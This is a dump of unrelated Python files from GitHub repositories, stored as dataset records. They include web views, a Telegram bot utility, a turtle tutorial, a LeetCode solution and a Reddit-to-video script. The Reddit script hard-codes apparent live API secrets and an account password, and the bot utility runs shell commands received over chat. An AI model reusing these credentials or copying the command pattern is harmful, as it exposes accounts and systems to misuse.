ref.get('Image')\n if equipment_query.Image and allowed_file(equipment_query.Image.filename):\n filename = secure_filename(equipment_query.Image.filename)\n equipment_query.Image.save(os.path.join(UPLOAD_FOLDER, filename))\n equipment_query.Image=UPLOAD_FOLDER+'/'+filename\n print(equipment_query.Image)\n else:\n equipment_query.Image='static/dist/img/user_logo.png'\n return equipment_query.Name,equipment_query.Quantity,equipment_query.Weight,equipment_query.Category,equipment_query.Company,equipment_query.Equipment_Charge,equipment_query.Image\n def Data_Unpaid_Customer(self):\n query = db.session.query(Payment).join(Registration and Plans).add_columns(Registration.User_Id,Registration.Fullname,Registration.Gender,Registration.Email,Registration.Contact,Plans.Plan_Name).filter(Payment.Customer_Id==Registration.User_Id,Payment.Plan_Id==Plans.Plans_Id,Payment.Status==\"Success\").order_by(Registration.User_Id).all()\n return query\n def Read_Unpaid_Customer(self,userId):\n query = db.session.query(Registration).filter_by(User_Id=userId).first()\n return query\n def date_Member(self):\n query = db.session.execute(db.select(Member.Start_Date).order_by(Member.Member_Id)).all()\n return query\n def Count_MemberId(self):\n query =db.session.execute(db.select(Member.Member_Id).order_by(Member.Member_Id)).all()\n return query\n def generate_order_id(self,price):\n data = { \"amount\": int(price)*100, \"currency\": \"INR\", \"receipt\": \"order_rcptid_11\" }\n payment = client.order.create(data=data)\n order_id=payment['id']\n return 
order_id\n def Graphical_Representation(self):\n query = db.session.execute(text('select MONTH(Start_Date) as Month_Number,MONTHNAME(Start_Date) as Month_Name,COUNT(*) as Member_Count from Members group by MONTH(Start_Date),MONTHNAME(Start_Date) order by MONTH(Start_Date)'))\n return query\n def Plan_Update(self,req,planId):\n plans = data(current_app).select_Plan(planId)\n plans.Price=req.get('Price')\n return plans.Price\n def payment(self,req):\n paid = Payment(\n Cutomer_Id = req.get('Customer_Id'),\n Plan_Id = req.get('Plan_Id'),\n Date = datetime.date.today(),\n Order_Id_RZP = req.get('Order_Id_RZP'),\n Payment_Id_RZP = req.get('Payment_Id_RZP')\n )\n return paid","repo_name":"Kuhan-12/gymtech","sub_path":"Admin/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":13302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20728980076","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\n__license__ = \"\"\"\n This file is part of Janitoo.\n\n Janitoo is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n Janitoo is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with Janitoo. If not, see .\n\n Original copyright :\n Copyright (c) 2013 Roger Light \n\n All rights reserved. This program and the accompanying materials\n are made available under the terms of the Eclipse Distribution License v1.0\n which accompanies this distribution.\n\n The Eclipse Distribution License is available at\n http://www.eclipse.org/org/documents/edl-v10.php.\n\n Contributors:\n - Roger Light - initial implementation\n\n This example shows how you can use the MQTT client in a class.\n\n\"\"\"\n__author__ = 'Sébastien GALLET aka bibi21000'\n__email__ = 'bibi21000@gmail.com'\n__copyright__ = \"Copyright © 2013-2014-2015-2016 Sébastien GALLET aka bibi21000\"\n#~ from gevent import monkey\n#~ monkey.patch_all()\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom flask import Blueprint, flash, request\nfrom flask_login import login_required, current_user\nfrom flask_themes2 import get_themes_list\nfrom flask_babelplus import gettext as _\n\nfrom janitoo.classes import CAPABILITY_DESC, GENRE_DESC, VALUE_DESC, COMMAND_DESC\n\nfrom janitoo_manager.extensions import babel, cache, janitoo\nfrom janitoo_manager.utils.helpers import render_template\nfrom janitoo_manager.user.models import UserMan\n\nportal = Blueprint(\"portal\", __name__)\n\n@portal.before_request\ndef start_listener():\n janitoo.start_listener()\n\n@portal.route(\"\")\ndef index():\n \"\"\"\n \"\"\"\n return render_template(\"portal/index.html\", user=current_user)\n\n@cache.cached(timeout=900)\n@portal.route('janitoo_constants.js')\ndef janitoo_constants_js():\n return render_template('janitoo_constants.js', capabilities=CAPABILITY_DESC, genres=GENRE_DESC, values=VALUE_DESC, 
commands=COMMAND_DESC)\n","repo_name":"bibi21000/janitoo_manager","sub_path":"src/janitoo_manager/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33422910007","text":"from django.core.exceptions import ValidationError\nfrom django.contrib.auth import login, get_user_model, logout\nfrom django.shortcuts import redirect, render\nfrom kbtuopen import settings\nimport hmac\nimport hashlib\nimport time\nfrom core.models import Team\nfrom core.forms import TeamForm, OrganizationForm, ParticipantForm\nfrom django.db.models import Count\n\ndef logoutView(request):\n logout(request)\n return redirect('home')\n\ndef telegramLoginView(request):\n\n req_parameters = request.GET\n \n\n bot_token = settings.TELEGRAM_BOT_TOKEN\n\n data_check_string = ['{}={}'.format(k, v)\n for k, v in req_parameters.items() if k != 'hash']\n \n data_check_string = '\\n'.join(sorted(data_check_string))\n \n built_hash = hmac.new(hashlib.sha256(bot_token.encode()).digest(),\n msg=data_check_string.encode(),\n digestmod=hashlib.sha256).hexdigest()\n\n\n if built_hash != req_parameters.get('hash'):\n raise ValidationError(\"Invalid hash\")\n\n current_timestamp = int(time.time())\n auth_timestamp = int(req_parameters.get('auth_date'))\n\n if current_timestamp - auth_timestamp > 86400:\n raise ValidationError('Auth date is outdated')\n \n user_id = req_parameters.get('id')\n\n User = get_user_model()\n\n try:\n user = User.objects.get(username=user_id)\n except User.DoesNotExist:\n user = User.objects.create(username=user_id)\n user.set_unusable_password()\n\n\n login(request, user)\n\n return redirect('team')\n\n\n\n\n\ndef homePageView(request):\n context = {\"user\": request.user}\n return render(request, \"index.html\", context)\n\n\ndef participant_view(request):\n if request.method == 'POST':\n form = ParticipantForm(request.POST)\n\n if form.is_valid() and request.user.team.members.count() <= 2:\n participant_form = form.save(commit = False)\n participant_form.team = request.user.team\n participant_form.save()\n\n return redirect('team')\n\n raise ValidationError(\"Invalid request\")\n\n\ndef teams_view(request):\n return render(request, 'teams.html', {'teams': Team.objects.annotate(num_members=Count('members')).filter(num_members__gt=0).order_by(\"id\")})\n \ndef organization_view(request): \n if request.method == 'POST':\n form = OrganizationForm(request.POST)\n\n if form.is_valid():\n form.save()\n \n return redirect('team')\n\n elif request.method == 'GET':\n form = OrganizationForm()\n \n return render(request, 'organization.html', {'form': form})\n\ndef team_view(request):\n team = None\n form = None\n participant_form = None\n\n if request.method == 'POST':\n form = TeamForm(request.POST)\n\n if form.is_valid():\n team_form = form.save(commit = False)\n team_form.owner = request.user\n team_form.save()\n \n return redirect('team')\n\n elif request.method == 'GET':\n \n\n if request.user.is_authenticated:\n \n \n if hasattr(request.user, \"team\"):\n team = request.user.team\n if team.members.count() < 3:\n participant_form = ParticipantForm()\n else:\n form = TeamForm()\n\n \n return render(request, 'team.html', {'form': form, 'user': request.user, 'team': team, 'participant_form': participant_form, 'is_reg_open': 
settings.IS_REGISTRATION_OPEN})","repo_name":"ZharaskhanAman/kbtuopen","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36032387381","text":"class Solution:\n def numDistinct(self, s: str, t: str) -> int:\n def helper(s, t):\n A = [[0] * (len(s) + 1) for _ in range(len(t) + 1)]\n for j in range(len(s) + 1):\n A[0][j] = 1\n for i in range(1, len(t) + 1):\n for j in range(1, len(s) + 1):\n A[i][j] = A[i][j - 1]\n if t[i - 1] == s[j - 1]:\n A[i][j] += A[i - 1][j - 1]\n return A[-1][-1]\n return helper(s, t)","repo_name":"DevashishPathrabe/LeetCode","sub_path":"LeetCode Solutions/Problems/115. Distinct Subsequences.py","file_name":"115. Distinct Subsequences.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33308460824","text":"import os\nimport unittest\n\nimport botctl.config\n\nfrom botctl.config import ConfigStore\n\nTEST_HOME = os.path.join(os.path.dirname(__file__), 'home')\n\n\nclass CommandTestCase(unittest.TestCase):\n def setUp(self):\n botctl.config.__configdir__ = TEST_HOME\n self.config = ConfigStore()\n\n def tearDown(self):\n if os.path.exists(self.config._path):\n os.unlink(self.config._path)\n\n def set_config_ini_content(self, content):\n with open(self.config._path, 'w') as config_file:\n config_file.write(content)\n","repo_name":"wizeline/botctl","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33125228776","text":"with open('./branch.txt', 'r') as f:\n lines = f.readlines()\nnew_lines = []\nfor line in lines:\n line = line.strip('\\n')\n new_lines.append(line)\n\nstr_list = str(new_lines)\nwith open('./branches.txt', 'w') as f:\n f.write(str_list)\n","repo_name":"Dechrissen/PokeQuiz","sub_path":"tools/makelist.py","file_name":"makelist.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"21904294666","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 23 13:04:59 2017\n\n@author: Vincent Gregoire\n\n# Turtle tutorial\n\nPrepared by [Vincent Grégoire](http://www.vincentgregoire.com), \nDepartment of Finance, The University of Melbourne. \n\nThis is a sample code to illustrate some basic features of the Python language.\nThis notebook was created as supplemental material to a Python for \nfinancial research bootcamp for finance honours and PhD students at \nthe University of Melbourne in March of 2017.\n\nLast update: March 24, 2017.\n\n**Contact**: \n\nLatest version: \n\"\"\"\n\nimport turtle\n\n# Let's create our turtle. We'll call it Bob\n\nbob = turtle.Turtle()\n\n# He doesn't look much like a turtle, but we can fix that.\nbob.shape(name='turtle')\n\n\n# We can move Bob different ways.\n\nbob.forward(100)\nbob.backward(100)\nbob.left(45)\n\n# We can draw with Bob\nbob.pendown()\nbob.pencolor('red')\nbob.forward(100)\n\n# Let's start again\nbob.reset()\n\n# Let's draw a square the hard way.\n\nbob.forward(100)\nbob.right(90)\nbob.forward(100)\nbob.right(90)\nbob.forward(100)\nbob.right(90)\nbob.forward(100)\nbob.right(90)\n\n# That's no good. 
We can use loops for that (Exercise!)\n\nbob.reset()\n\nfor i in range(4):\n bob.forward(100)\n bob.right(90)\n\n# Now let's write a function to draw a square of any size\n\ndef drawSquare(size):\n for i in range(4):\n bob.forward(size)\n bob.right(90)\n\ndrawSquare(50)\ndrawSquare(200)\n\n# We can even add an optional color argument, and take any turtle!\n\ndef drawSquare(turt, size, color=None):\n if color is not None:\n # Save current pen details\n old_color = turt.getpen().color()[0]\n turt.pencolor(color)\n \n for i in range(4):\n turt.forward(size)\n turt.right(90)\n \n if color is not None:\n # Reset pen details\n turt.pencolor(old_color)\n \ndrawSquare(bob, 200)\ndrawSquare(bob, 200, 'red')\n\n# Say we want to draw squares of squares size (!?!?!)\n\nbob.reset()\n\nsquares = [x*x for x in range(1,21)]\n\nfor x in squares:\n drawSquare(bob, x)\n \n\n# Say we wanted a function to draw any Shape?\n\ndef drawShape(turt, size, sides):\n # First, we need the angle. A full loop is 360 degrees, each angle is\n # a fraction of that. We have the same number of angles as sides.\n angle = 360.0/sides\n for i in range(sides):\n turt.forward(size)\n turt.right(angle)\n\ndrawShape(bob, 100,10)\n\ndrawShape(bob, 10,30)\n\nbob.reset()\n\n# We can draw more complex shapes by combining them\n# Say we want a house\n\ndef drawHouse(turt, size):\n drawSquare(turt, size)\n turt.left(60)\n drawShape(turt, size, 3)\n turt.right(60)\n turt.penup()\n turt.right(45)\n turt.forward(size/5.0)\n turt.left(45)\n turt.pendown()\n drawSquare(turt, size/2.5)\n turt.penup()\n turt.right(45)\n turt.backward(size/5.0)\n turt.left(45)\n turt.pendown()\n\ndrawHouse(bob, 100)\n\n\n# Now we can draw a full neighborhood... but it's a lot of work deciding where\n# to place the house. Let's leave it to chance.\n\nbob.reset()\n\nfrom numpy.random import random\n\n# random() will return a number between 0 and 1.\nrandom()\n\n# We can generate many at a time\nrandom(5)\n\ndef drawNeigborhood(turt, houses=10):\n # In this case, we need 3 numbers: size, x and y coordinates.\n # But it looks better if size is a function of the y coordinate\n # (close == looks bigger).\n rnd = random((houses, 2))\n # Size is between 10 and 80, x and y between -200 and +200\n rnd = (rnd * (200 - (-200))) -200\n \n for i in range(houses):\n turt.penup()\n turt.setposition(rnd[i,0], rnd[i, 1])\n turt.pendown()\n y = rnd[i, 1]\n # For size, we want to smooth it, bigger at -200 (80) at smallest at\n # back (10)\n size = 80 - (((y + 200) / 400) * (80 - 10))\n drawHouse(turt, size)\n\ndrawNeigborhood(bob, 5)\n\nturtle.done()","repo_name":"vgreg/python-finance-unimelb2017","sub_path":"listings/TurtleTutorial.py","file_name":"TurtleTutorial.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"20424124856","text":"import os\nimport requests\nimport setup\nimport time\nimport subprocess\nimport telepot\nfrom constants import ownerChatId, ownerName\nfrom constants import botApi, doumentDownloadUrl\nfrom userUtils import getAdmins\n\nfrom teleModel.models import users\n\n\nbot = telepot.Bot(botApi)\ndownloadDir = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"tmp\")\n\ndef alertOwner(message):\n for admin in getAdmins():\n bot.sendMessage(admin, message)\n\ndef sendMessage(chatId, message):\n bot.sendMessage(chatId, message)\n\ndef timedeltaToReadable(td):\n return \"{} days, {} hours, {} minutes\".format(td.days, td.seconds//3600, 
(td.seconds//60)%60)\n\ndef executeCommand(command, sendOut=False):\n errors = \"\"\n try:\n executedCmd = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output, errors = executedCmd.communicate()\n if errors:\n return \"Error Occurred with command execution, error: {}\".format(str(errors))\n else:\n retStr = \"Command executed successfully!\"\n if sendOut:\n retStr += \"\\n{}\".format(output)\n return retStr\n except Exception as e:\n return \"Error Occurred while execution, error: {}\".format(str(errors))\n\ndef downloadFile(filepath, fileName):\n try:\n url = doumentDownloadUrl + filepath\n res = requests.get(url, allow_redirects=True)\n downloadPath = os.path.join(downloadDir, fileName)\n with open(downloadPath, 'wb') as download:\n download.write(res.content)\n return downloadPath\n except Exception as e:\n return \"Error Occurred: {}\".format(str(e))\n\ndef CreatesuperAdmin():\n try:\n if not users.objects.filter(userId=ownerChatId).exists():\n usersObj = users()\n usersObj.userId = ownerChatId\n usersObj.addedBy = ownerChatId\n usersObj.name = ownerName\n usersObj.isAdmin = True\n usersObj.save()\n sendMessage(ownerChatId, \"Super user added successfully!\")\n except Exception as e:\n sendMessage(ownerChatId, \"Error occurred in adding user, error:{}\".format(str(e)))\n\ndef addRequest(senderChatId, senderName):\n if users.objects.filter(userId=senderChatId).exists():\n sendMessage(senderChatId, \"Hi {}, You are already a user of this bot!\".format(senderName))\n else:\n for admin in getAdmins():\n sendMessage(admin, \"{}/{} is requesting to be added to the bot, use \\\"add user <chatId>/<name>\\\" to add a user\".format(senderChatId, senderName))\n sendMessage(senderChatId, \"Your add request has been placed successfully\")\n\ndef upgradeRequest(senderChatId, senderName):\n if users.objects.filter(userId=senderChatId, isAdmin=True).exists():\n sendMessage(senderChatId, \"Hi {}, You are already an admin of this bot!\".format(senderName))\n else:\n for admin in getAdmins():\n sendMessage(admin, \"{}/{} is requesting to be added as an admin to the bot, use \\\"make admin <chatId>\\\" to add a user\".format(senderChatId, senderName))\n sendMessage(senderChatId, \"Your admin request has been placed successfully\")\n\ndef addedMessage(data):\n newUserChatId, name = data.strip().split(\"/\")\n sendMessage(newUserChatId, \"Hi {}, you have been added to the bot, Welcome!!\".format(name))\n\ndef upgradedMessage(data):\n newAdminChatId = data.strip()\n sendMessage(newAdminChatId, \"Hi, you have been added as an admin.\")","repo_name":"pramodelangovan/rpi-telegramAutomater","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73434818078","text":"class Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n if (list1 == None and list2==None):\n return list1\n head = ListNode(0,None)\n header = head\n while( list1 and list2 ):\n if(list1.val <= list2.val):\n header.val = list1.val\n list1 = list1.next\n else:\n header.val = list2.val\n list2 = list2.next \n header.next = ListNode(0,None)\n header = header.next \n if(list1):\n header.val =list1.val\n header.next = list1.next\n elif(list2):\n header.val = list2.val\n header.next = list2.next\n return head\n","repo_name":"Euaell/A2SV","sub_path":"Merge Two Sorted Lists.py","file_name":"Merge Two Sorted 
Lists.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72118262239","text":"from cocoCaption.pycocotools.coco import COCO\nfrom cocoCaption.pycocoevalcap.eval import COCOEvalCap\nimport skimage.io as io\nimport pylab\nimport json\nfrom json import encoder\n\ndef prepareCoco():\n encoder.FLOAT_REPR = lambda o: format(o, '.3f')\n dataDir='.'\n dataType='val2014'\n algName = 'fakecap'\n annFile='%s/cocoCaption/annotations/captions_%s.json'%(dataDir,dataType)\n subtypes=['results', 'evalImgs', 'eval']\n [resFile, evalImgsFile, evalFile]= \\\n ['%s/cocoCaption/results/captions_%s_%s_%s.json'%(dataDir,dataType,algName,subtype) for subtype in subtypes]\n\n coco = COCO(annFile)\n cocoRes = coco.loadRes(resFile)\n cocoEval = COCOEvalCap(coco, cocoRes)\n cocoEval.params['image_id'] = cocoRes.getImgIds()\n cocoEval.evaluate()\n\n return (coco, cocoRes, cocoEval)\n","repo_name":"DanielSlusarczyk/Projekt-Indywidualny","sub_path":"funkcje/Coco.py","file_name":"Coco.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16486354832","text":"CLIENT_ID = 'icyWDqKFjJ-yyKmtZpOugQ'\nSECRET_KEY = 'Eav5ILz4lmBFnmcQqwsrs0dMEp9Kyw'\n\nimport requests\nfrom requests.api import request\nimport pandas as pd\nfrom gtts import gTTS\nfrom moviepy.editor import *\n\nimport os\nimport time\nimport datetime\nfrom Google import Create_Service\nfrom googleapiclient.http import MediaFileUpload\n\nauth = requests.auth.HTTPBasicAuth(CLIENT_ID,SECRET_KEY)\ndata = {'grant_type':'password','username':'adzaaDev','password':'Adamko1997'}\nheaders = {'User-Agent':'MyApi/0.0.1'}\nres = requests.post('https://www.reddit.com/api/v1/access_token',auth=auth,data=data,headers=headers)\nTOKEN = res.json()['access_token']\nheaders['Authorization'] = f'bearer {TOKEN}'\nres = requests.get('https://oauth.reddit.com/r/confession/new',headers=headers,params={'limit':'20'})\nresults_json = res.json()\ndf = pd.DataFrame()\nfor post in res.json()['data']['children']:\n df = df.append({\n 'subredit':post['data']['subreddit'],\n 'title':post['data']['title'],\n 'selftext':post['data']['selftext']\n },ignore_index=True)\n\ndf.to_csv('reddit_articles.csv')\n\ntext = \"\"\nfor i in res.json()['data']['children']:\n text = i['data']['title'],\n\n\n\ndef text_to_speech(text):\n text = ''.join(text)\n mytext = text\n\n language = 'en'\n myobj = gTTS(text=mytext, lang=language, slow=False)\n\n text = myobj.save(\"welcome.mp3\")\n audio_text = AudioFileClip(\"welcome.mp3\")\n return audio_text\n\n\n\ndef make_a_video():\n audio_text = text_to_speech(text)\n img = ['lion.png']\n\n clips = [ImageClip(m).set_duration(2)\n for m in img]\n\n concat_clip = concatenate_videoclips(clips, method=\"compose\",)\n concat_clip = concat_clip.set_audio(audio_text)\n concat_clip.write_videofile(\"test_with_audio2.mp4\", fps=24)\n\n\ntext_to_speech(text)\nmake_a_video()\n","repo_name":"AdamKmet1997/reddit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29325480160","text":"\"\"\"\nYou are taking part in an Escape Room challenge designed specifically for programmers. In your efforts to find a clue, you've found a binary code written on the wall behind a vase, and realized that it must be an encrypted message. 
After some thought, your first guess is that each consecutive 8 bits of the code stand for the character with the corresponding extended ASCII code.\n\nAssuming that your hunch is correct, decode the message.\n\"\"\"\ndef messageFromBinaryCode(code):\n i=0\n o=''\n while i None:\n super().__init__(collision_checker)\n self._visited: Dict[State, int] = {}\n self._parent_table: Dict[State, State] = {}\n self._queue = PriorityQueue()\n\n def _heuristic(self, state_1: State, state_2: State) -> int:\n raise NotImplementedError(\n f\"Heuristic function for {self.__class__} is not implemented\"\n )\n\n def _cleanup(self):\n self._visited.clear()\n self._parent_table.clear()\n self._queue = PriorityQueue()\n\n def _make_path_from_parent_table(self) -> Path:\n list_states = [self.goal_state]\n current_state = self.goal_state\n while current_state != self.start_state:\n current_state = self._parent_table[current_state]\n list_states.append(current_state)\n list_states.reverse()\n cost = self._visited[self.goal_state]\n return Path(list_states, cost)\n\n def plan(self) -> Path:\n if self.start_state is None:\n raise ValueError(\n f\"{self.__class__}: Start state was not set, use set_start_state(state) method before calling plan()\"\n )\n\n if self.goal_state is None:\n raise ValueError(\n f\"{self.__class__}: Goal state was not set, use set_goal_state(state) method before calling plan()\"\n )\n\n if self.workspace is None:\n raise ValueError(\n f\"{self.__class__}: Workspace was not set, use set_workspace(space) method before calling plan()\"\n )\n\n if self.available_actions is None:\n raise ValueError(\n f\"{self.__class__}: List of available actions was not set, use set_available_actions(actions) method before calling plan()\"\n )\n\n self._cleanup()\n self._queue.put(PrioritizedState(0, self.start_state))\n self._visited[self.start_state] = 0\n\n while not self._queue.empty():\n current_state = self._queue.get().state\n if current_state == self.goal_state:\n final_path = self._make_path_from_parent_table()\n print(f\"{self.__class__}: Path was found\")\n print(\n f\"{self.__class__}: Number of visited states: {len(self._visited)}\"\n )\n print(f\"{self.__class__}: Final cost: {final_path.cost}\")\n return final_path\n for action in self.available_actions:\n next_state = action.apply(current_state)\n if self._collision_checker.is_collision(next_state):\n continue\n if next_state not in self._visited.keys():\n self._visited[next_state] = (\n self._visited[current_state] + action.cost()\n )\n self._parent_table[next_state] = current_state\n self._queue.put(\n PrioritizedState(\n self._visited[next_state]\n + self._heuristic(next_state, self.goal_state),\n next_state,\n )\n )\n elif (\n self._visited[current_state] + action.cost()\n < self._visited[next_state]\n ):\n self._visited[next_state] = (\n self._visited[current_state] + action.cost()\n )\n self._parent_table[next_state] = current_state\n\n print(f\"{self.__class__}: Could not find path between states\")\n return Path([], 0)\n\n\nclass Dijkstra(AStar[Position2DDiscreteTheta]):\n def __init__(self, collision_checker: CollisionChecker) -> None:\n super().__init__(collision_checker)\n\n def _heuristic(\n self, state_1: Position2DDiscreteTheta, state_2: Position2DDiscreteTheta\n ) -> int:\n return 0\n\n\nclass AStarL1Heuristic(AStar[Position2DDiscreteTheta]):\n def __init__(self, collision_checker: CollisionChecker) -> None:\n super().__init__(collision_checker)\n\n def _heuristic(\n self, state_1: Position2DDiscreteTheta, state_2: 
Position2DDiscreteTheta\n ) -> int:\n return abs(state_2.x - state_1.x) + abs(state_2.y - state_1.y)\n\n\nclass AStarL1WithAngleHeuristic(AStar[Position2DDiscreteTheta]):\n def __init__(self, collision_checker: CollisionChecker) -> None:\n super().__init__(collision_checker)\n\n def _heuristic(\n self, state_1: Position2DDiscreteTheta, state_2: Position2DDiscreteTheta\n ) -> int:\n return (\n abs(state_2.x - state_1.x)\n + abs(state_2.y - state_1.y)\n + abs(state_2.theta - state_1.theta)\n )\n","repo_name":"HelloWorld21951/skoltech-path-planning","sub_path":"PS1/nikolay_naglov_ps1/planners/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36212124949","text":"import re\nimport sys\nimport ChangeLevel\nimport nltk\nimport Globals\nfrom nltk.corpus import cmudict\n\n\"\"\" Reading level analyzer.\n\nThis module reads in text from a file and analyzes the reading level.\n\nExample:\n The program can be run by the following command::\n\n $ python main.py input.txt\n\nAuthors:\n Charles Billingsley\n Josh Getter\n Adam Stewart\n Josh Techentin\n\n\"\"\"\n\n\ndef get_next_line():\n \"\"\"\n Looks at the global line number and file and sets the given variable to the\n data at that line\n \"\"\"\n current_line_data = ''\n\n # Open the file and loop until the requested line number is found\n with open(Globals.input_file) as file:\n\n for number, line in enumerate(file):\n if number == Globals.current_line_number:\n current_line_data = line\n break\n\n # If the line data was updated increment the current line number\n # and return the found data\n if current_line_data:\n Globals.current_line_number += 1\n return current_line_data\n else:\n return \"!!!End of File!!!\"\n\n\ndef get_syllables(words):\n \"\"\"\n Uses the nltk corpus library to get the syllables of each word. 
If the word\n    is not found in the cmu dictionary, it manually parses the word.\n\n    Code in this section is based off of the following Stack Overflow post:\n    https://datascience.stackexchange.com/questions/23376/\n    how-to-get-the-number-of-syllables-in-a-word\n\n    :param words: The list of words to be parsed\n    :return: The total number of syllables\n    \"\"\"\n\n    number_of_syllables = 0\n\n    for word in words:\n        try:\n            ''' If word is in the dictionary, get its syllables list.\n             Then take the pronunciation with the maximum syllables'''\n            number_of_syllables += max(\n                [len(list(y for y in x if y[-1].isdigit()))\n                 for x in Globals.dictionary[word.lower()]])\n        except KeyError:\n            # The cmu dictionary didn't have the word so manually parse it\n            number_of_syllables += manually_parse_syllables(word)\n\n    return number_of_syllables\n\n\ndef manually_parse_syllables(word):\n    \"\"\"\n    Manually finds the syllables in a word if\n    the cmu dictionary did not have it.\n\n    This code is adapted from:\n    https://www.stackoverflow.com/questions/14541303/\n    count-the-number-of-syllables-in-a-word\n\n    :param word: The word to be parsed\n    :return: The number of syllables in the word\n    \"\"\"\n    count = 0\n    vowels = 'aeiouy'\n    word = word.lower()\n    if word[0] in vowels:\n        count += 1\n    for index in range(1, len(word)):\n        if word[index] in vowels and word[index - 1] not in vowels:\n            count += 1\n    if word.endswith('e'):\n        count -= 1\n    if word.endswith('le'):\n        count += 1\n    if count == 0:\n        count += 1\n    return count\n\n\ndef strip_punctuation(tokens):\n    \"\"\"\n    Strips the punctuation from the list of tokens.\n\n    :param tokens: The list of words and punctuation from nltk\n    :return: A list of words without punctuation\n    \"\"\"\n    words_or_digits_only_regex = re.compile('.*\w+.*')\n\n    # If the word matches the regex, save it. Else ignore it\n    words_only_with_contractions = [word for word in tokens if\n                                    words_or_digits_only_regex.match(word)]\n\n    remove_contractions_regex = re.compile(\"\w*'\w*\")\n\n    # Remove all the contractions as nltk counts them as 2 words\n    words_only = [word for word in words_only_with_contractions if\n                  not remove_contractions_regex.match(word)]\n\n    return words_only\n\n\ndef get_number_of_sentences(file_text):\n    \"\"\"\n    Calculates the number of sentences based on the punctuation using regex.\n\n    :param file_text: The text in the file\n    :return: The number of sentences\n    \"\"\"\n\n    ''' \n    Regex that looks for punctuation, followed by an optional\n    quotation mark, followed by white space and/or a new line, followed by\n    a capital letter or a quotation mark. Should match text such as \n    the following:\n    . \"\n    . 
T\n .\"\\n\" \n '''\n end_of_sentence_regex = re.compile('(([.!?])\"*(\\s+|\\n+)([A-Z]|\"))')\n\n number_of_sentences = len(\n re.findall(end_of_sentence_regex, file_text)\n ) + 1 # +1 accounts for the last sentence\n\n return number_of_sentences\n\n\ndef calculate_reading_level_score(number_of_words, number_of_sentences,\n number_of_syllables):\n \"\"\"\n Calculates the reading level score of the file using the Flesch-Kincaid\n Reading Ease Formula.\n\n The formula is as follows:\n 206.835 - 1.015 (Total Words / Total Sentences)\n - 84.6 (Total Syllables / Total Words)\n\n :param number_of_words: The number of words in the piece\n :param number_of_sentences: The number of sentences in the piece\n :param number_of_syllables: The number of syllables in the piece\n :return: The calculated reading level score from the Flesch-Kincaid Reading\n Ease Formula\n \"\"\"\n first_flesch_kincaid_constant = 206.835\n second_flesch_kincaid_constant = 1.015\n third_flesch_kincaid_constant = 84.6\n\n return first_flesch_kincaid_constant - second_flesch_kincaid_constant * (\n number_of_words / number_of_sentences) \\\n - third_flesch_kincaid_constant * (\n number_of_syllables / number_of_words)\n\n\ndef convert_score_to_reading_level(score):\n \"\"\"\n Converts the score from the Flesch-Kincaid Reading Ease Formula into the\n equivalent reading level.\n\n :param score: The score calculated from the\n Flesch-Kincaid Reading Ease Formula\n :return: The description of the reading level\n \"\"\"\n if 100.0 >= score >= 90.0:\n return \"5th Grade Reading Level\"\n elif 90.0 > score >= 80.0:\n return \"6th Grade Reading Level\"\n elif 80.0 > score >= 70.0:\n return \"7th Grade Reading Level\"\n elif 70.0 > score >= 60.0:\n return \"8th & 9th Grade Reading Level\"\n elif 60.0 > score >= 50.0:\n return \"10th to 12th Grade Reading Level\"\n elif 50.0 > score >= 30.0:\n return \"College Reading Level\"\n elif 30.0 > score >= 0:\n return \"College Graduate Reading Level\"\n else: # Got a number greater than 100, or less than 0.\n return \"A reading level so complex, it cannot be classified.\"\n\n\ndef main():\n \"\"\"\n The main function\n \"\"\"\n\n with open(Globals.input_file) as file:\n Globals.file_content = file.read()\n\n while True:\n # Parse each sentence\n sentence = get_next_line()\n\n if sentence == \"!!!End of File!!!\":\n break\n\n Globals.full_input += sentence\n\n tokens = nltk.word_tokenize(sentence)\n words = strip_punctuation(tokens)\n Globals.total_words += len(words)\n\n Globals.total_syllables += get_syllables(words)\n\n 